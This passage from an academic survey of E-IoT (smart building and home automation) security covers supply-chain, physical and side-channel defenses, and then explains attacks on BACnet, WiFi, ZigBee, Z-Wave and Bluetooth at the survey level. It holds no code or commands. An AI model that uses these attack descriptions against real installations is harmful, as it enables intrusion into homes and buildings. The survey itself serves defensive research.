A few solutions were proposedin the literature to defend against supply chain attacks. Inorder to secure the device endpoints, Yang et al. proposedan RFID-based solution that authenticates devices once theyare deployed [60]. This work was taken further with theintroduction of ReSC by the same authors, a solution proposedto defend against the theft of authentic smart devices, and theinsertion of counterfeit malicious devices [61], [62]. Anotherapproach by Chamekh et al, proposed the use of a Merkle treemanagement framework applied to supply chain architectureto provide a more trusted system and defend against supplychain attacks [63]. During transportation stages, tamper-proofand tamper-evident packages and equipment may also preventunauthorized attackers from tampering with devices beforethey reach a client [144], [145]. The European Union Agencyfor Cybersecurity (ENISA) provided comprehensive guidelinesfor IoT supply chain security [143]. These guidelines dividedefense strategies into several relevant stages relevant to E-IoT:product design, component assembly and embedded software,device programming, platform development, distribution andlogistics, technical support & maintenance, and device recov-ery & repurpose. For product design, guidelines dictate thatsecure software libraries and cryptographic practices, sabotageprevention, tamper-resistant software and hardware, and chainof trust are design practices that may prevent supply-chainattacks. These guidelines are detailed in Table III. Furtherthe ENISA guidelines highlight that vendors can take somepreventative measures such as, working with suppliers thatprovide security guarantees, maintaining transparency, havinga skilled workforce, promoting security awareness, and devel-oping novel trust models.One of the largest topic of research is counterfeit compo-nents inserted in the supply chain, as such best practices andsolutions have been proposed. For instance, ENISA guidelineshighlight that parts used during manufacturing should beauthenticated to prevent counterfeit components from enteringthe supply chain. Further, to prevent defective components,ENISA also advises for quality control and testing of partsto prevent defective components [143]. Surveys conducted onthe topic of counterfeit devices and hardware Trojans havesuggested several solutions [56], [57]. First, optical inspection based detection relies on reverse engineering to detect Trojans.As such, techniques such as scanning optical microscopy, scan-ning electron microscopy, and pico-second imaging circuityanalysis are used. Images captured with these techniques arethen compared to benign chipsets provided by the designer.Testing-based detection techniques use functional testing todetect Trojans. As such, a functional set of vectors need to bedesigned for each chipset. Side-channel detection approachesrely on factors such as power consumption, EM emissions,and time delays to detect anomalies. Such approaches canalso be used to detect trojans. For instance Agarwal et al.used Principle Component Analysis to create a side-channelfingerprint of a circuit and compare it to a known, benignmodel [146]. Run-time detection approaches are also used,usually combining hardware and software to detect trojans. Forinstance, DEFENSE is a proposed monitoring framework thatoperates at device run-time to detect hardware anomalies andtrojans [147]. Finally, invasive techniques modify integratedcircuit’s structures to avoid the insertion of hardware Trojans.Authors have shown that hardware obfuscation methods canprevent Trojan insertion and assist other detection methods[148]–[150].
Physical Security.
Physical security of cabling and devicesis an important part of E-IoT deployments as E-IoT devicescan be stolen, tampered with, or otherwise damaged. Vendorsimplement some physical mitigations and best practices formany of their devices. Additionally, E-IoT systems make aneffort towards tamper-proofing their systems and offer sugges-tions on physical installation. For instance, Control4 releasedan exterior installation security best practices document [80].This document highlights several important points on exposeddevices such as door stations used for gate access and intercom.First, installers are encouraged to use standard tamper-resistantsecurity screws shipped with devices to prevent opportunistsfrom stealing or tampering with devices. Second, relays usedto open security gates should not be connected at the doorstation itself and instead to a relay inside the building. Relays’endpoints should be in a secure location as physical attackersmay compromise devices by tampering with relays and gainunauthorized access to locations. Finally, they acknowledge therisks associated with the network cable running to public in-terfaces (e.g., door stations, intercoms) and highlight solutionssuch as network isolation, MAC address filtering, and wirelessdoor station access as possible solutions. In some instances,E-IoT components may only be removed with custom toolsto prevent theft and tampering. For instance, touchscreensmay come with a special tool so that an unprepared attackercannot easily remove the interface [151]. Finally, integratorsand users should take advantage of monitoring tools (e.g.,wireless monitoring, IP monitoring) to identify devices thatfall offline to know if they have been tampered with. Practicesused for loss prevention may also be useful for E-IoT. Conceptssuch as beacons, smart tags, and geo-fencing may preventnode capture attacks and alert integrators before an attackoccurs [74]. Integrators may also take certain steps in theinstallation to make sure that E-IoT devices are secure. Forinstance, installers should follow best practices, place sensorsin places where they are not easily reachable and do notFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. UluagacTABLE III: Supply Chain Defenses Suggested by ENISA [143].
Stages Topic Description
Product Design Secure Building Blocks Ensuring usage of accepted security standards (e.g., cryptography, software).Sabotage Prevention Monitoring for security flaws created by insider threats.Recovery Plan Consider security mechanisms, fail safes, and a recovery plan for the future.Combined Security Controls Security mechanisms must consider HW and SW interactions. Security controls (e.g., secure boot) require the usageof tamper resistant hardware.Chain of Trust Definition A clearly defined chain of trust is necessary to ensure trust on HW and SW elements.Resource Constraints Purposely developing devices so that current and future security measures can be implemented.Component Manufacturing Counterfeit Components Mitigating security threats from counterfeit components through hardware authentication.Defective Components Quality control and usage of tested parts to avoid security and device degradation.Component Assembly + Firmware Access Control Ensure access control mechanisms exist to software, firmware updates and other maintenance operations.Embedded Software Backdoors Monitoring on suspicious behaviours and backdoors implanted in hardware or low-level code.Device Programming Secure Provisioning Ensuring the use of end-to-end provisioning mechanisms guaranteeingthe security of credentials and cryptographic information.Coding Practices Adoption of best practices such as code reviews and continuous integration of cybersecurity checks in thesoftware development cycle.Platform Development Development Focus Placing a development approach to focus both on functionality and security.Dependencies Management Checks and review process to ensure that dependencies and libraries are available and conform to security practices.Network Security Ensure that local network policies minimize the risk of intrusion.Distribution and Value-added Resellers Certification of resellers and third-party distributors to prevent tampering and unauthorized distribution of devices.Logistics Theft and Counterfeit Additional security measures to protect against theft and insertion of counterfeit or malicious components.ProtectionDevice Identity Enabling the ability to identify devices during the fabrication and distribution stages using different HW and.SW components.Registration Tracking Ensuring proper device registration and onboarding into smart platforms such that devices can be tracked.Technical Support OTA Control Tools Adoption of remote Over-The-Air control tools used for maintenance are properly managed and securedand Maintenance through a chain of trust.Software Patches Usage of software versions that mitigates threats exposed in latest security disclosures.Device Recovery Data Removal Adopting secure data removal techniques to avoid sensitive information remaining on devices.and Repurpose leave any exposed wiring in installations. As noted earlier,physical access to exposed wiring and devices would makeit trivial for an attacker to compromise an E-IoT system inpublic and unmonitored areas. Further, installers and usersshould consider physical access control to prevent access byunauthorized users.
Side Channel and Sensory Channel Defenses.
There exista number of defense solutions against side-channel attacks.For instance, for EM and many side-channel eavesdroppingattacks, physical security and encryption provides a level ofdefense. For attacks that rely on sound, AuDroid is a policy-based framework for smart devices proposed by Petracca et al.[152]. AuDroid controls information flow in audio channelsand notifies users when audio access is requested. Accesscontrol frameworks such as these may present a viable solutionfor side-channel attacks where sensory and audio channels canbe abused. A number of defense mechanisms proposed forsensors and wireless sensor networks may be applicable toE-IoT against side-channel attacks. For instance, for sensorsin mobile devices such as phones, security mechanisms havebeen an ongoing topic of research [83]–[87]. However, manyof these proposed solutions rely on software-based approachesto defend against sensor-based attacks. Alternatively, solutionssuch as frameworks and intrusion detection systems havebeen proposed for wireless sensor networks and may applyto large E-IoT deployments configured to rely more heavilyon sensors for programmed events [153], [154], [154]–[157].One example, 6thSense, a sensor-based defense mechanismby Sikder et al. takes a machine learning approach to detectmalicious behavior occurring in smart devices [18], [97], [98]. The proposed solution relies on sensor co-dependence, sensorsampling, and real-time monitoring. Since E-IoT systems mayshare some similarities to proposed solutions (e.g., multiplesensors, centralized design), these defense mechanisms mayapply to E-IoT against side-channel and sensory channelattacks. While many of these solutions may protect againstside-channels, some side-channel attacks (e.g., LightEars) donot have direct solutions proposed beyond physical securityand require future research.
Battery Exhaustion Defenses.
A number of mitigation strate-gies have been proposed to combat battery exhaustion at-tacks on wireless devices. The solution for E-IoT may beentirely dependent on the type of the system. For instance,battery exhaustion defenses may be different in a Zigbeevs another wireless-based deployment. Buennemeyer et al.proposed Battery-Sensing Intrusion Protection System (B-SIPS) that focuses on small mobile hosts and correlatespower consumption with wireless activity [103]. Moyers etal. proposed an intrusion detection system (IDS) to protectagainst malicious activities [101]. The proposed Multi-vectorPortable Intrusion Detection System (MVP-IDS) works bymonitoring electrical current changes and correlating this withmalicious traffic. Other IDSs have been developed, such asthe one proposed by Nash et al. that uses CPU load anddisk access to estimate power consumption and detect ifbattery exhaustion attacks are occurring [104]. In situationswhere devices may be homogeneous, defenses against batteryexhaustion attacks can be based on comparing these devicesto create a realistic baseline and find anomalies that may beeffective in wireless sensors and interfaces [105]. Finally, workFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagacby Hristozov et al. using rate limiting approaches to defendagainst battery exhaustion attacks reported to be successfulfor devices supporting RESTful services [106].V. C
OMMUNICATIONS L AYER
In this section, we firstly cover components of the E-IoTCommunications layer such as interfaces and protocols. Wefollow up with the threat model for this layer. Moreover,we introduce E-IoT communication layer threats and attacks.Finally, we highlight mitigations and security mechanisms ap-plicable to the E-IoT communications layer. Table IV providesan overview of components, attacks, threats, and mitigationstrategies at the E-IoT communications layer.
A. Elements of the E-IoT Communications Layer
Ethernet.
Internet Protocol (IP) communication has becomeone of the most widely deployed standards in internal andexternal networks. Often, modern homes and offices alreadyhave the physical Ethernet wiring and infrastructure for Inter-net Protocol. As such, an E-IoT system installer can use bothstandards (IPv4 or IPv6) for Ethernet-based communication[222]. Additionally, with IP, integrators have the flexibility todivide traffic flow of connected devices with subnetting andvirtual LANs (VLANs). For instance, an integrator can dividea larger network into segmented sections with subnetting,determining the maximum number of devices in each segmentthrough network configuration [223]. Similarly, VLANs areused to improve information flow, security and better managean IP network [224]. For instance, Pakedge, a vendor of E-IoT-centered network solutions, encourages VLANs for E-IoTinstallations and network segmentation [225]. As IP is popularand widely supported by many vendors, E-IoT systems willoften use IP communication in some of their components. Eth-ernet provides the advantage of a superior level of reliabilityand speed compared to the wireless counterpart. Further, Eth-ernet can power devices through Power-over-Ethernet (PoE)technology [226]. As such, integrators only need to cable aPoE-capable connection to a device, such as a touchscreen, toprovide data and power through a single connection. Physicalcabling has proven to be a reliable communication methodbetween smart components and remains popular for high-bandwidth, high-reliability applications. For instance, Ethernetmay be used to control devices in the equipment rack suchas IP-capable A/V receivers, Ethernet-powered IP cameras,or hardwired touchscreens [227]. Moreover, Ethernet offersdifferent networking topologies (e.g., star, ring, single-switch),which grant integrators the flexibility needed for custom E-IoTinstallations [228].
WiFi.
Wireless Fidelity (WiFi) is a frequently used com-munication protocol for smart devices where Ethernet ca-bling endpoints are not viable. Various modes within IEEE802.11 have allowed for increased speeds and frequencies.The main advantage of wireless communication is that E-IoTdevices (e.g., thermostats, controllers, A/V) may use a wirelessconnection without requiring an extra physical connectionto integrate into an existing system. Similarly to EthernetCategory cables: 802.11 generations b, a, g, n provide different levels of data rates, as well as operate in 2.4 GHz or 5.0GHz [229]. In many E-IoT systems, WiFi serves differentpurposes due to its widespread nature. Many smart devicevendors enable wireless network connections natively on theirdevices, making such devices easy to integrate into E-IoTsystems. Examples of WiFi usage in E-IoT systems mayinclude interfaces (e.g., phones, touch screens, tablets) andphysical devices (e.g., displays, receivers, projectors). In termsof WiFi security, a number of configurations are availablefor accepted WiFi security standards, such as the WirelessEquivalent Standard (WEP) which is obsolete now or WiFiProtected Access (WPA), with the latest release being WPA3security [230], [231]. Furthermore, in larger and more complexnetwork deployments, enterprise solutions exist and are usuallyinstalled by trained integrators [232]. As such, a number ofdifferent configurations are possible with WiFi communicationdependent on the equipment, level of security, and installationrequirements of an E-IoT deployment.
ZigBee and Z-wave.
Two of the most popular mesh-networkprotocols for smart devices are ZigBee and the proprietaryZ-wave [233], [234]. Various vendors have embedded radiocommunication hardware on their thermostats to connect theirdevices to more extensive mesh networks. While ZigBee andZ-wave are different protocols, they are used for similarpurposes in E-IoT systems. For instance, these protocols areoften used in low-bandwidth applications to integrate devicessuch as thermostats, light dimmers, relays, and sensors toa larger system. Mesh networking allows users to retrofitexisting installation by replacing existing components such aslight switches for wireless-enabled components. For Zigbee,usually, there are three types of devices within the ZigBeemesh network: a coordinator, routers, and end devices [235].The ZigBee coordinator is the root of the ZigBee networkand manages components necessary for ZigBee to operate(e.g., security keys, access control, security policies, stackprofile). The ZigBee Router relays information and routesZigBee packets among devices. Some ZigBee routers may alsohave the functions of end-devices. Finally, the end-devicessend and receive communication from parent nodes and areusually designed for a specific purpose (e.g., door locks, lightbulbs, sensors). Z-wave follows a similar device architecturewith three basic device types, controllers, routers, and slaves.These devices fulfill similar purposes as their ZigBee counter-parts [236].
Bluetooth is a wireless standard for data exchange betweenportable and fixed devices. A short-wavelength protocol, Blue-tooth operates from the 2.4 to 2.485 GHz range [237]. Ad-ditionally, Bluetooth may operate as Bluetooth Low-Energy(BLE) or Bluetooth Mesh, which allow for more varied appli-cations to the protocol [238]. With the number of Bluetoothdevices in the market, E-IoT systems are compatible with theprotocol for different purposes. For instance, Savant may useBluetooth Low Energy for their smart lighting solutions, whileother systems use Bluetooth for connecting mobile devices andstream music to the central system [239]. Bluetooth networks,commonly known as piconets, follow a master and slavearchitecture where up to seven active slave devices can beconnected to a master device [240].FOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. UluagacTABLE IV: Overview of E-IoT Communication Layer Attacks, Threats, and Mitigations.
Component Attack/Threat MitigationsSerial-based Protocols Proprietary Protocol Attacks [158] Vendor updates, access control, and honeypots [159].Modbus & BACNet Attacks [160]–[163] Protocol-specific defenses, network security, protocol improvements, product updates,WiFi WEP Attacks [164], [165] Update the WiFi security protocol and update to WPA2 or WPA3 if possible [166], [167].WPA/WPA2/WPA3 Attacks [165], [168]–[174] Wireless equipment patching, custom SSID names, WiFi best practices, strong passwords,firewalls, disabling WPS functionality, network security [166], [167], [170], [175].ZigBee and Z-Wave ZLL Attacks, Ghost-in-Zigbee Disable nonce reuse, software/firmware updates, recommended configuration, protocolZigbee DoS, KillerBee, and changes, message authentication [176]–[179].other Zigbee Attacks [180]–[186]Z-force, rogue controllers Always enable encryption, software/firmware updates, recommended configuration, protocolcontroller duplication, and changes, authentication on all messages [176]–[179].other Z-wave attacks [180], [187], [188]Bluetooth Bluesniping, Bluechopping Software updates, setting Bluetooth to non-discoverable mode, directional antennas, disablingBluecutting, Bluedepriving, and Bluetooth when not in use [189].other Bluetooth Attacks [176], [190]–[204]IR IR Attacks [205], [206] Access control and CCTV monitoring.General Wireless Jamming [207]–[212] Defenses vary by wireless protocol used and implementation [207]–[210], [213]–[216].HDMI-Based Protocols CEC-Based Attacks [217]–[220] Access control, CEC-less cables/adapters, and IDS such as HDMI-Watch [221]. IR Infrared (IR) is a wireless optical communication mediumused to control devices over short, line-of-sight ranges [241].While limited, as it cannot penetrate through walls and theshort transmission rate, IR remains popular in many consumerdevices (e.g., A/V, televisions remotes, motorized compo-nents). As such, because of this widespread support, IR seescommon use in many E-IoT systems that need to integratethese devices into centralized E-IoT systems. E-IoT systemsintegrate these devices using IR flashers placed on physicaldevices; these flashers relay messages directly to the receivingdevice [242]. As some devices can only be controlled throughIR, E-IoT makes widespread use of IR communication.
Proprietary Wireless
Not all protocols used by E-IoT systemsare well-known or open-source. Proprietary wireless commu-nication protocols are often used in E-IoT systems and havenot seen much research. For instance, the Radio TechnologySomfy (RTS), is used by Somfy, one of the major vendorsof E-IoT motorized blinds [243]. Similarly, popular systemvendors such as Lutron, Levitron, Legrand, and Crestron alsouse proprietary wireless protocols that have remained mostlyunexplored [244]–[247]. Table V highlighted some proprietarywireless protocols used by E-IoT systems and their usage inE-IoT.
Serial-based.
Serial-based communication is a precursor toseveral modern device communication standards. While manymay consider the use of serial-based communication as dep-recated, various E-IoT systems and connected devices of-ficially support serial-based communication for system-to-device integration. Further, some E-IoT systems have builttheir systems on top of existing serial-based communication forproprietary devices. For instance, since the accepted inceptionin 1969 [248], Recommended Standard 232 (RS-232) hasbeen a well-known medium for device-to-device communi-cation. This standard is often used in E-IoT environmentsfor communication between devices. Some of these devicesinclude thermostats, projectors, A/V receivers, A/V switchers,motorized lifts, displays, pool controllers, motorized drapery,and alarm systems that interface with other devices directlythrough serial-based links. A more specific example is theCarrier Infinity Series systems module for HVAC units. Thismodule allows an E-IoT system to communicate with Carrier Fig. 5: E-IoT System with, daisy-chain topology configurationwith two lines and controlled devices.HVAC systems through serial interface or allow for remoteaccess using a physical Ethernet connection [249]. In manycases, serial-based communication is wired in a “daisy-chain”bus configuration where the cabling goes from device-to-device instead of each device is individually wired to the E-IoTcontroller as shown in Figure 5. Such a wiring configurationis a common practice in E-IoT, as daisy-chain is easier to wireand saves the integrators and users in labor and wiring costs.The use of serial-based protocols for a variety of use-casesis widespread among E-IoT vendors. For instance, Crestron’sCresnet has become a ubiquitous name in residential, marine,and commercial installations [250]. Cresnet uses RS-485 half-duplex communication used for communication between de-vices (e.g., interfaces, components, keypads) and the controller[251]. Similarly, vendors such as Control4, LiteTouch, andSavant use proprietary serial-based protocols to communi-cate with interfaces [252]–[254]. These connections usuallyFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagacare daisy-chained together and work with multiple lines. Inaddition to these examples, many product vendors manu-facture devices with native serial communication to wheremany devices and systems are integrated into E-IoT throughserial communication. For instance, advanced audio receivers,televisions, and alarm systems can all be integrated into E-IoT using serial communication [44], [227], [255], [256]. Thetechnical specifications of many of these highlighted serial-based communication protocols are not publicly available, andthus any security mechanisms remain largely unknown.Another type of serial-based communication are buildingautomation protocols such as BACnet. BACnet was designedspecifically to meet the requirements for automation and con-trol within corporate offices, buildings, and other commercialestablishments. BACnet can be integrated into some E-IoTsystems, with many devices available. The protocol is alsoused for communication in sensors, security systems, energymanagement, lighting control, physical access systems, andelevator controls [163]. BACnet operates on top of RS-485and RS-232 to provide application and networking layers fordevice operation. BACnet implements four layers: ApplicationLayer, Network Layer, Data Link Layer, and Physical LinkLayer. In this protocol, RS-232 is used for point to pointcommunication while RS-485 handles Master/Slave TokenPassing [257]. Since BACnet is an open protocol, it has beenadopted by various device vendors and manufacturers as a formof external control.
HDMI.
The High Definition Multimedia Interface (HDMI) isone of the core components of audio/video systems. It actsas the main physical connection between multiple devices(e.g., televisions, projectors, video players, receivers). As such,HDMI is one of the most common interfaces used worldwide,with billions of compatible devices in the wild [258]–[260].Per HDMI design, communication transmitted is not limitedto audio and video, as HDMI transmits control and informationsignals through the cabling through the 19-pin connector[261]. Further, HDMI can be a part of distribution networkswith switchers, splitters, and other interconnects that allowmultiple HDMI-enabled devices to share A/V signals andcommunicate. As A/V distribution is an important part of E-IoT, HDMI serves a major role in E-IoT systems [262]–[264].Further, some E-IoT systems use communication protocolsembedded in HDMI to control and integrate devices intoan E-IoT system [265]. For instance, the HDMI connectionincludes the Consumer Electronics Control (CEC) to expandthe functionality of HDMI systems [266]. The CEC protocolis a component of HDMI communication and was developedto enable interoperability between HDMI devices. CEC is alow-bandwidth protocol with a maximum of 16 devices andfunctions in a bus architecture. Some E-IoT systems use CECto control A/V devices such as receivers, televisions, andprojectors. Thus, many vendors implement CEC features ontheir devices under different trade names, including Anynet+(Samsung), Aquos Link (Sharp), BRAVIA Link/Sync (Sony),CEC (Hitachi), CE-Link and Regza Link (Toshiba), SimpLink(LG), VIERA Link (Panasonic), EasyLink (Philips), Realink(Mitsubishi) [267]. TABLE V: Examples of E-IoT system proprietary RF proto-cols.
Vendor Protocol Product LinesLutron Clear Connect Technology RF [244] Lighting, Shades, InterfacesSomfy Radio Technology Somfy [243] Lighting, Shades, InterfacesLevitron LevNet RF [247] Lighting, Shades, InterfacesLegrand TopDog RF [246] Lighting, Shades, InterfacesCrestron infiNET EX/ER [245] HVAC, Lighting, Shades, Interfaces
B. Threat Model for E-IoT Communications Layer
In this layer, we consider Mallory compromising an E-IoTsystem through the communications layer, targeting the confi-dentiality, availability, and integrity of the system. Thus, Mal-lory compromises the E-IoT system through communicationcomponents, often without the need of physical access. Attackson this layer may benefit weak protocols, protocol vulnerabil-ities, flaws in implementation, and other similar factors. Assuch, Mallory, in this case, is knowledgeable in communicationvulnerabilities and has the equipment necessary to compro-mise E-IoT. For instance, Mallory may carry sniffers and thesoftware necessary to eavesdrop on communication channelsand inject messages into E-IoT communication. We explainMallory’s possible roles in attacking E-IoT communicationlayer as follows:
Visitors and Unprivileged Users.
Some users (e.g., visitors,insiders) may not have sufficient privileges to interact with allof the components of a deployed E-IoT system. Mallory, as amalicious unprivileged user, may use protocol vulnerabilities togain unauthorized access to devices near her. As such, attackson serial-based protocols, short-range wireless, and HDMI arefeasible. An unprivileged user may just need some preliminaryknowledge of the protocols used.
IoT Hackers.
Malicious actors such as hackers may targetE-IoT systems specifically in public locations (e.g., presen-tation rooms, bars, campuses). In this scenario, Mallory asa malicious hacker, may choose to perform reconnaissanceof an E-IoT deployment without direct physical access tothe system. Additionally, more sophisticated attackers mayattempt to compromise a system, gain unauthorized access,cause Denial-of-Service attacks, or otherwise disrupt E-IoToperations through the communications layer. In this case,Mallory only has unauthorized access to all E-IoT systemcomponents.
C. Communication Layer: Attacks and Vulnerabilities
In this subsection, we give an overview of the attacks andvulnerabilities of the E-IoT Communications Layer. Specif-ically, we cover attacks to serial-based protocols, wirelessprotocols, HDMI-based protocols, and building automationprotocols.
Serial-based Protocol Attacks.
One of the challenges ofproperly evaluating serial-based protocols in E-IoT is theproprietary nature of many of these protocols. Many propri-etary protocols are long-lived and do not advertise any formof security mechanism to the communication. Informationon many of these protocols (e.g., Cresnet) is sparse. Theseprotocols rely largely on security through obscurity as many ofFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagacthese protocols were designed for functionality but not securityin mind. Even with this lack of research, online communitiesand integrators have explored E-IoT protocols and managed tocreate sniffers to capture serial-based communication for de-bugging [158]. As such, these sniffers work without any formof authorization beyond physical access and expose possiblethreats to E-IoT serial-based protocols. One can draw parallelsto industrial control protocols, a comprehensive review of thesecurity channels in industrial protocols can be found in astudy by Volkova et al. [160]. This study highlighted that agingserial-based communication technologies such as Modbus canbe attacked (e.g., credential theft attacks, replay attacks, Man-in-the-middle attacks) by a knowledgeable attacker.An analysis in 2003 by the Department of Commerce foundsome threats to building automation protocols such as BACnet.While most systems were not connected to the Internet, therewas still backdoor access via modem connections to controllers[161]. The study also noted various attacks on passwords, con-fidentiality, integrity, Denial of Service, spoofing, and eaves-dropping within a BACnet installation. Gasser et al. discussedresearch on Internet-exposed BACnet systems [162]. BACnet isoften an integral part of connected Industrial Control Systems(ICS); these are critical infrastructural systems for any sizebusiness and offices [268]. BACnet operates on UDP ports47808-47823 on default [163]. Researchers used a pre-madeBACnet payload in conjunction with Zmap [269] to scan fordevices in the IPv4 address space for valid responses. Usingthis methodology, researchers managed to confirm a total of15,429 exposed BACnet devices on the Internet. A notablecharacteristic of BACnet/IP UDP protocol is that it is bothstateless and does not require handshake nor authentication.The previously mentioned characteristics of BACnet makeit susceptible to Amplification Attacks, a Denial-of-Serviceattack where a response payload is larger than the requestpayload [162].
WiFi Attacks.
WiFi communication has been an active topicof research due to its broad appeal and uses in many con-nected devices. A myriad of WiFi attacks have been coveredin different publications, surveys, and technical documents.Additionally, attacks may be dependent on installed hardware,firmware, security used (e.g., WEP, WPA, WPA2, WPA3),and specific implementation. A survey by Lashkari et al.highlighted weaknesses to security mechanisms in WiFi com-munication [165]. Specifically, this work notes that WEP issusceptible to attacks (e.g., packet forgery, replay attacks,de-authentication) and vulnerabilities such as improper key-management and problems with the RC-4 algorithm. Otherwork from Borisov et al. goes further into the insecuritiesof the WEP protocol and how poor security practices (e.g.,keystream reuse, key management) allows an attacker to com-promise WiFi with WEP security [164]. Specifically, WEPis vulnerable to eavesdropping attacks, message modification,message injection, message decryption, authentication spoof-ing, and reaction attacks against WEP. While considered moresecure, WPA vulnerabilities also exist. Lashkari et al. note thatWPA/WPA2 has definite security improvements over WEP,such as the use of the Advanced Encryption Standard (AES)and the Temporal Key Integrity Protocol (TKIP) [165]. However, even with improvements, WPA and WPA2 can besusceptible to attacks (e.g., brute force attacks, dictionary at-tacks). A related attack for WPA/WPA2 is a handshake captureattack. An attacker can capture the communication handshakeand attempt to perform brute force attacks or dictionary attacksagainst the captured handshake [168]. An attack proposed byVanhoef et al. introduces key re-installation attacks againstWPA/WPA2 where attackers can force a WiFi network to reuseold keys and compromise confidentiality in the network [169].As such, key re-installation attacks would allow Mallory toperform actions such as packet replay, decryption, and forgingin some implementations, severely impacting the confiden-tiality and integrity of WiFi communications. Other attackssuch as the Reaver and Pixie-Dust attacks also target WPA-based security, specifically exploiting the WiFi Protected Setup(WPS) protocol in routers [170]. Finally, as a newer securitymechanism, some weaknesses have been found in WPA3. Assuch, denial-of-service attacks, connection deprivation attacks,and handshake attacks can compromise WiFi communicationwith WPA3 security [171]–[174]. As many E-IoT devices useWiFi communication, any WiFi attacks could compromise theconfidentiality, integrity, and availability of E-IoT and E-IoT-integrated components.
ZigBee and Z-Wave Attacks.
Wireless technologies are com-mon in E-IoT systems in many different use-cases and havebeen an active topic of research in the security community.As described in [180], various communication protocols (e.g.,ZigBee, Z-Wave) can be attacked, negatively impacting E-IoT systems by directly affecting user interfaces. There havebeen known security breaches in ZigBee devices. The ZigBeeLight Link (ZLL) standard was designed with easy clientintegration, and installation in mind [181]. One known breachin 2015 involved the leakage of the master key for light-basedZigBee devices. This leak rendered ZLL devices insecure[182]. It must be noted that there are variations betweenZigBee systems, software, hardware, and chipsets; not allattacks may be effective on all ZigBee Systems even if theZigBee stack is an accepted standard.Energy depletion attacks such as Ghost-in-ZigBee [183]may prove to be effective against battery-powered E-IoT com-ponents. In addition to depleting ZigBee devices’ power, it canfacilitate threats such as DoS and replay attacks on a ZigBeenetwork. The attack method involves sending false messages tonodes within a ZigBee network to trigger processor-intensivecomputations (e.g., cryptographic operations). The damageof these unnecessary computations is both power-based andperformance based on the affected device. Ghost-in-ZigBeeattacks also demonstrate three unique types of DoS attacks.First is a computational load attack, which can be done bysending numerous messages at the same time to trigger thedepletion of a node’s energy. However, such an attack couldbe easily detected with abnormality detection. The secondtype of DoS is referred to as MAC misbehavior, which takesadvantage of ZigBee’s channel sensing. When a targeted nodereceives continuous traffic, all nodes within that region will notcommunicate through that node. The third is a replay attackin which a malicious attacker may use frame counters greaterthan valid values in their message. Since ZigBee keeps anFOR EDUCATIONAL PURPOSES ONLY!ubmitted to Elsevier AdHoc Networks L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. UluagacAccess Control List (ACL) table, this table will be updatedto match the malicious counter values. Any legitimate nodetrying to make contact after the alteration will be rejecteddue to their frame counter values being less than the alteredvalues, leading to a malicious spoofing attack. The article [180]mentions a third attack on ZigBee spanning from hardwareimplementations. Going further in-depth, in [184], researchersattacked an implementation of an Atmel chip used with PhillipsHue bulbs and ZigBee Light Link (ZLL) mode. In this attack,the researchers created a custom circuit board to target theZigBee chipset used with smart bulbs and created a worm tospread the infection among light nodes.In [185] three types of attacks on ZigBee were demon-strated using the KillerBee toolkit [186]. The first attack takesadvantage of ZigBee’s discovery process and mimicked alegitimate device to gather information about other deviceswithin the ZigBee network. This information spans variouschannels and will yield responses from ZigBee nodes withina channel. The second attack is the interception of packages.This attack functions on the basis that some ZigBee networksuse weak or no encryption. As such, an attacker can eavesdropon communication using the toolset and a USB adapter tocapture traffic on a given channel. As the third proposed attack,if the previous two attacks are successful, an attacker canintercept and record ZigBee traffic. As such, an attacker canreplay previously recorded packets and have ZigBee devicesaccept sent messages. Z-Wave vulnerabilities may dependon implementation practices, firmware, and hardware. Usingreverse engineering methods, Fouladi et al. in [187] providedsome examples of available exploits that could compromiseentire devices. The attack used Z-force, a packet interception,and injection tool, to reset the established network key and takeadvantage of the protocol’s steps. The researchers describe theissue as a lack of ’state validation’ in some Z-wave devices.An attacker can use packet injection to force Z-Wave devicesto overwrite their current shared network key with an attacker-specified key. They demonstrated a successful attack on aconnected door lock. While follow-up publications note thatsome of the attacks described have been patched, devices thathave not been updated and usage of older firmware may bevulnerable to these attacks [180].The research by Fuller et al. explored vulnerabilities ofrogue controllers within Z-Wave established networks ranges[188]. This work introduced an attack that used a maliciousZ-Wave controller to attack unsecured devices. To begin, theresearchers established a Home Automation Network (HAN)using Z-wave devices such as connected door locks, smartlights, and connected water valves. The attacker must first gainaccess to the local WLAN network to perform this attack,assuming the network is improperly secured. Once access tothe network has been granted, an attacker can scan the networkand retrieve the address of the Z-Wave gateway and anyother gateways. The researchers then took advantage of knowngateway vulnerabilities and, in this case, attacked a VeraEdgeZ-Wave controller. Further, they retrieved and saved a backupfile for the entire system. With this information, the researcherscould then duplicate a legitimate Z-Wave controller with amalicious one in the same network. This rogue controller could then communicate to Z-wave devices within that network,compromising all of the available devices. The researchers alsonoted that with this backup file, there is the possibility thatsensitive information and activity can be retrieved. Further,log files could also prove valuable to an attacker gatheringinformation in usage or future attacks.
Bluetooth Attacks.
Another popular short-range wireless so-lution is Bluetooth. As mentioned earlier, Bluetooth is usedby some E-IoT systems during standard operation and deviceconfiguration. Due to mobile devices, IoT, and other commonuse-cases of Bluetooth, attacks on Bluetooth have been widelydocumented, with a number of surveys written on the topicof Bluetooth security [190]–[194]. Relevant to E-IoT, attackshighlighted in these surveys include man-in-the-middle attacksthat can occur by compromising Bluetooth’s Secure SimplePairing (SSP) to impersonate trusted parties [195]–[200]. Fur-ther, another attack relevant to E-IoT is Bluesniping, whichuses specialized antennas to sniff Bluetooth communicationbeyond the expected Bluetooth range [201]. Bluesniffing at-tacks may also be a concern, as attackers may be able to inferE-IoT activity from sniffing packets coming from Bluetooth-based interfaces and devices [202]. Disruption attacks suchas Bluechopping, Bluecutting, and Bluedepriving may alsoaffect the availability of E-IoT devices as these attacks allwork to disrupt Bluetooth communication through differentapproaches [176]. For instance, for bluechopping, an attackerspoofs the identity of a connected Bluetooth device to cause aDoS condition. Bluecutting, an attack that disrupts Bluetoothcommunication by spoofing a Bluetooth device and requestinga target device begins re-pairing. As 